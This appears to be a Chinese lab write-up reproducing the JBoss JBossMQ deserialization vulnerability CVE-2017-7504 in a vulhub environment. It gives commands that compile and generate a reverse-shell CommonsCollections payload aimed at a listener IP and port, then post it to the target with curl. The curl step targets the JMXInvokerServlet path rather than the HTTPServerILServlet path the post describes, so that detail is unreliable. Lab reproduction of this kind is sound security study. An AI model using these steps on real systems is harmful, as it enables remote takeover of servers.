Loading

CVE-2017-7504 JBoss 4.x JBossMQ JMS 反序列化漏洞

0X00-引言


love is over

请你不要再提起

过去就像如流云

他妈的总是要思考一些骚话,要不然不符合我这文艺的个性,wocao

0X01-环境搭建


靶机:CentOS Linux 7

攻击机:windows server 2016 && Kail

环境:vulhub

项目地址:https://github.com/vulhub/vulhub

搭建vulhub请访问:空白centos7 64 搭建vulhub(详细)

0X02-环境描述


JBoss AS 4.x及之前版本中,JbossMQ实现过程的JMS over HTTP Invocation LayerHTTPServerILServlet.java文件存在反序列化漏洞,远程攻击者可借助特制的序列化数据利用该漏洞执行任意代码。

该漏洞出现在/jbossmq-httpil/HTTPServerILServlet请求中,若访问200,则可能存在漏洞。

影响版本:JBoss AS 4.x及之前版本

0X03-漏洞复现


和CVE-2015-7501 JBoss JMXInvokerServlet 反序列化漏洞利用流程一样,只不过是接口换了而已

01-验证

http://192.168.234.128:8080/jbossmq-httpil/HTTPServerILServlet

image-20211221213131862

可能存在漏洞

02-重定向到ReverseShellCommonsCollectionsHashMap.ser文件
javac -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap.java
java -cp .:commons-collections-3.2.1.jar  ReverseShellCommonsCollectionsHashMap 192.168.234.135:888   #填写监听机IP和port
curl http://192.168.234.128:8080//invoker/JMXInvokerServlet --data-binary @ReverseShellCommonsCollectionsHashMap.ser  #提交二进制数据

image-20211221200545588

image-20211221213724772

03-反弹shell

image-20211221213802102

0X04-工具检测


工具下载:https://github.com/s0k/Deserialize

乱码不知什么原因

image-20211221213907851

0X05-免责声明


仅供学习使用

0X06-参考


[Vulhub] JBoss反序列化漏洞复现

posted @ 2021-12-21 22:09  美式加糖  阅读(160)  评论(0编辑  收藏  举报